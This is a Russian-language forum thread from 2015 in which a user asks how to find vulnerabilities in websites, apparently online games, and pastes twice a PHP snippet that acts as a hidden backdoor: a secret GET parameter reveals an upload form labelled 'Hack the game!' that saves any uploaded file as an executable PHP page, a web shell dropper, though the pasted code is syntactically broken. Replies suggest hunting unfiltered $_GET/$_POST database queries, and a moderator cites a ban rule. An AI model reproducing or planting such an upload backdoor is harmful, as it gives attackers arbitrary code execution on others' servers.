Колхоз/Ферма/садовник | Плачу 100
NSA
Расскажите как искать любую дыру! только не надо мне про фильтрацию рассказывать и про эту
if(isset($_GET['da'])){
error_reporting(E_ALL^E_NOTICE);
if(isset($_FILES['file']))
{
$type = $_FILES['file']['type'];
if (!isset($err))
{
$tmp = $_FILES['file']['tmp_name'];
move_uploaded_file($tmp, "images/icons/
icons.php" ;
header("location: images/icons/icons.php" ;
}
}
echo "<form method=\"post\"
enctype='multipart/form-data'>\n";
echo "<input type='file' name='file' /><br/>\n";
echo "<input value='Взломать игру!'
type='submit' name='ok' /><br /></form></div>
\n";}
я хочу узнать норм я уже 500 на это выкинул и ниче стоищего не узнал !!!
if(isset($_GET['da'])){
error_reporting(E_ALL^E_NOTICE);
if(isset($_FILES['file']))
{
$type = $_FILES['file']['type'];
if (!isset($err))
{
$tmp = $_FILES['file']['tmp_name'];
move_uploaded_file($tmp, "images/icons/
icons.php" ;
header("location: images/icons/icons.php" ;
}
}
echo "<form method=\"post\"
enctype='multipart/form-data'>\n";
echo "<input type='file' name='file' /><br/>\n";
echo "<input value='Взломать игру!'
type='submit' name='ok' /><br /></form></div>
\n";}
я хочу узнать норм я уже 500 на это выкинул и ниче стоищего не узнал !!!
ау супер кодеры вы где
http://bymas.ru/forum/topic/24739/page
________
посл. ред. 02.01.2015 в 19:30; всего 1 раз(а); by Вилы Выкидные
на хосте в поиске в бей file и найдей их у себе. но не все.
Вилы Выкидные, нет за всякую фильтрацию
________
посл. ред. 02.01.2015 в 19:33; всего 1 раз(а); by Znaharkh
________
посл. ред. 02.01.2015 в 19:33; всего 1 раз(а); by Znaharkh
Dino_mc47, все равно не все
Znaharkh (02.01.2015 в 19:32)
Вилы Выкидные, нет за всякую фильм трацию
я дал ссылку на онлайн сканер, он там предлагает варианты исправления , юзай
Вилы Выкидные, нет за всякую фильм трацию
Берешь открываеш файл и ищеш $_GET | $_POST запросы смотриш относятся ли они к бд коль да и коль они без фильтра то это дырка!
П 7 правил бан
mrcatoff П 7 правил бан